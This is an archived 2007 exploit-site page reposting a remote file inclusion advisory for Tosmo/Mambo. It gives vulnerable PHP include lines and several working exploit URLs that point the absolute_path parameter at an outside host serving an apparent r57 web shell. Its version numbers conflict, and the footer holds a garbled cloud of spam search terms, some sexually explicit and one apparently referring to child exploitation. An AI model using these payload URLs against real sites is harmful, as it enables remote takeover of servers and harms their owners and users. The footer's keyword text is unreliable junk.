about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns




2007-04-12 TOSMO/Mambo 1.4.13a (absolute_path) Remote File Inclusion Vulns
Rated as : High Risk

=======================================================
Tosmo Mambo <= 4.0.12 (absolute_path) Multiple RFI Vulnerabilities
=======================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
=======================================================
Homepage: www.Hack-Teach.com
=======================================================
Script Site :
http://www2.tutorial.hu/letoltes/dl.php?p=/scriptek/joomla/mambo.4.0.x&i=tosmo_mambo.zip
==============================================
File : /components/com_minibb.php
include("$absolute_path/components/minibb/bb_admin.php");
======
/components/com_minibb.php?absolute_path=http://nachrichtenmann.de/r57.txt?

========================================================

File : /components/minibb/bb_plugins.php

<?php
include ($absolute_path.'/components/minibb/hack_smilies.php');
?>
======
/components/minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_minibb/bb_plugins.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================

File : configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
include_once("$absolute_path/version.php");
======
/configuration.php?absolute_path=http://nachrichtenmann.de/r57.txt?
=======================================================
#Long Life Palestine
#www.Hack-Teach.com
securitydot.net - 2007-04-12

Advertising

Copyright 2007, SecurityDot
Wed, 02 Dec 2009 11:07:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Darwin 9.0 lucia lapi h22222 Linux 2.4 html explo Video garl mambo Remo www.sex ve www.zangdi www.aiqing gono www.youxix bengali mo free mp3 r aspplaygro 200 /compo Chaildsexp t412t Azrael's_s freeqqqqqs ANIMAL SEX DG834G WWWzooxxx. Thrisa SIMRAN SEX nudephotoe princ of p mambo Remo Simran sex www.tjndy. L860.cn mambo Remo www.30metr openssh 3 L860.cn wwwsexworl Crack Data www.sexboy www.139000 www.89c co CMS is Fre postfix driver not Nacked gir Crack Data mambo Remo www.bluesk NEW.AND.TO 200 /compo exploited